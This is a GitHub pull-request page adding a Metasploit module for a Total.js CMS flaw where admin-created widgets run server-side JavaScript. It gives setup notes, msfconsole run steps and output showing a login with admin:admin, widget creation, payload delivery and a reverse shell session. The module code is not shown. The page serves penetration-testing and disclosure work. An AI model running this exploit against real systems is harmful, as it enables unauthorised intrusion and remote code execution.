Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add Total.js CMS Code Injection in Widget Creation #12365

merged 5 commits into from Oct 21, 2019


Copy link

wchen-r7 commented Sep 25, 2019


Total.js is a Node.js Framework for building e-commerce applications, REST services, real-time apps, or apps for Internet of Things (IoT), etc. Total.js CMS is a Content Management System (application) that is part of the Total.js framework. A commercial version is also available, and can be seen used world-wide.

In Total.js CMS, a user with admin permission may be able to create a widget, and extend CMS functionalities for visitors. However, this can also be abused to upload JavaScript code that will be evaluated server side. As a result, it is possible to embed malicious JavaScript in the new widget, and gain remote code execution.

Vulnerable Setup

First, please install node. You can do this easily with brew, for example:

$ brew install node

And then download the following. There is a, just run that to start the server (will be port 8000):


  • Start msfconsole
  • set rhosts [ip]
  • set srvhost [ip]
  • set target [id] (0 = Linux, 1 = Mac)
  • set payload [payload name]
  • run
  • You should get a session



msf5 exploit(multi/http/totaljs_cms_widget_exec) > check
[*] - The target appears to be vulnerable.


msf5 exploit(multi/http/totaljs_cms_widget_exec) > run
[*] Exploit running as background job 37.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 
[*] Using URL:
[*] Server started.
msf5 exploit(multi/http/totaljs_cms_widget_exec) >
[*] Attempting to authenticate with admin:admin
[+] Authenticatd as: admin:admin
[*] Creating a widget...
[+] Widget created successfully
[*]     totaljs_cms_widget_exec - requesting: /vd9qtAXD/p_qxVkK
[*]     totaljs_cms_widget_exec - Sending payload to
[*] Command shell session 32 opened ( -> at 2019-09-25 17:00:12 -0500
[*] Finding the payload from the widget list...
[+] Widget cleared successfully

msf5 exploit(multi/http/totaljs_cms_widget_exec) >
@wvu-r7 wvu-r7 changed the title Add TotaJS CMS Code Injection in Widget Creation Add Total.js CMS Code Injection in Widget Creation Oct 3, 2019
@wvu-r7 wvu-r7 self-assigned this Oct 10, 2019

This comment has been minimized.

Copy link
Contributor Author

wchen-r7 commented Oct 15, 2019

I have updated the code. Please let me know if there's anything else I need to change. Thanks!

wvu-r7 approved these changes Oct 21, 2019
Copy link

wvu-r7 left a comment

Thank you!

wvu-r7 added a commit that referenced this pull request Oct 21, 2019
@wvu-r7 wvu-r7 merged commit 0ebc971 into rapid7:master Oct 21, 2019
3 checks passed
3 checks passed
Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Metasploit Automation - Test Execution Successfully completed all tests.
continuous-integration/travis-ci/pr The Travis CI build passed
msjenkins-r7 added a commit that referenced this pull request Oct 21, 2019

This comment has been minimized.

Copy link

wvu-r7 commented Oct 21, 2019

Release Notes

This adds an exploit against the Total.js CMS framework, written in Node.js. An attacker with administrator credentials may create a new widget containing arbitrary JavaScript code that is evaluated server-side.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
None yet
3 participants
You can’t perform that action at this time.